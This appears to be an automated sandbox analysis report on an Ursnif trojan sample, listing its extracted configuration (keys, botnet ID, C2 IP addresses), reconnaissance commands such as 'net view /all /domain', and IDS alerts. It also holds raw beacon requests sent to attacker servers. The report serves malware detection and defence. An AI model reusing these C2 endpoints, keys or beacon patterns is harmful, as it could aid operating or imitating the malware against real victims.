Source: 0.2.Lx6.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7

Source: Lx6.exe

Malware Configuration Extractor: Ursnif {"RSA Public Key": "t3qotb1uLz0WQBQfwLqib6qEJZE+UWboYbVA8D0wT+tWlc5qtQDeaqzOC2nQDK16TGqueaW5oGs4CGiO/MdFt2KusjJx8+1kpFAzW86uZJOIIf4iTEkhS3MyiIa/Q7lcVfHfnxpB+UbYYggJs5GX2bL7AmnKln9+gOVwUuO7JAeDw+DtYHnZsQ5QWiILRjbhzgULABNMELryH3vhxO50soxjs3xWLliZ7NkotkIovW5lDNqd0O2XXyoOurxXjuZGPEbbhRZBpHdWEhqREXH1enS9abglL6UWQWXDddw6a+cdOzlsIkv4dFlHNnlldLue5uJRFh2QmHZUYokW7tGSKTbEnFyrm9DfIThSGsj+rn4=", "c2_domain": ["tel12.msn.com", "194.76.225.60", "185.212.47.133"], "botnet": "1900", "server": "50", "serpent_key": "0FL5S9PzrGv40a6p", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: Lx6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr\|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00768664 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

0_2_00768664

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_00752299
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_00761577
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	0_2_0075154D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	35_2_03022299
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	35_2_0302154D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	35_2_03031577

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe	Domain query: www.msn.com

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49701 -> 52.169.118.173:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic	Snort IDS: 2021814 ET TROJAN Ursnif Variant CnC Beacon 3 192.168.2.4:49703 -> 194.76.225.61:80

Uses nslookup.exe to query domains

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic	HTTP traffic detected: GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
Source: global traffic	HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic	HTTP traffic detected: GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Content-Length: 54Connection: Keep-AliveCache-Control: no-cacheData Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 \| "0xaaa494e7_6314cd46c4ff5" \| 0

Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net
Source: powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net1g
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net1g71lXXnduT6klnGfile://c:
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobp/E
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ogp.me/ns#
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.558784999.0000021F35581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.861404017.00000191D4411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.l
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA12OBYj.img?h=368&
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000E.00000000.541728807.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.481741357.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.517838181.0000000008260000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22M
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Lx6.exe, 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.388832296.000000000131B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1665493296&rver=7.0.6730.0&am
